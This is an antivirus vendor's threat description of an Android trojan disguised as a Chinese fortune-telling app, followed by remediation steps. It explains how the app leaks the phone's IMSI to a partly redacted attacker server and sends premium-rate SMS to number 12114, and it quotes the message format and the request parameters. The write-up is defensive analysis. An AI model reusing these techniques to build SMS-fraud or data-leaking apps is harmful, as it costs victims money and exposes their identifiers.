Android/MobileTx.A!tr is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as a Chinese fortune telling application however, leaks information from the victim's phone such as IMSI. It also sends out SMS messages to a premium rate number, hence causing losses for the user.
The malicious application comes in packages such as com.tx.pet The malicious package contains the following classes :
- MainActivity : It creates the application view and starts the task ValidateAsyncTask described below. Next, it checks if the TxActivity is running, every 12 secs, and if not, launches it.
- ValidateAsyncTask : It reads the phone's IMSI and registers the phone with the attacker's server by sending out a POST request to
hxxp://[REMOVED].tx.com.cn:8081/client/xxx.xxwith the IMSI as a parameter.
In turn the server responds with a group of #-separated values that are reads as the uid, imsi and phonenumber, in that order.
Next, it sends out an SMS message to the premium number 12114 with the contents
"å¤©ä¸‹#99#" + imsi + "#android#sp_jifeng"
- TxActivity : This activity contacts the URL
http://[REMOVED].tx.com.cn:8081/client/xxxx.xx?viewerId="+uid+"&imsi="+imsi+"&phonenum="+phonenum+"&type=15where the parameter variables are the value received in the previous request.
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.